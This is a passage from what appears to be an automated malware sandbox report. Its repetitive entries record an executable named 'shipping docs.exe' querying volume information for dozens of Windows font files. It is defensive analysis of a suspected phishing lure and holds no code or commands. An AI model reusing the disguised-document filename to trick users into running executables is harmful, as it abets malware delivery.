                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\shipping docs.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
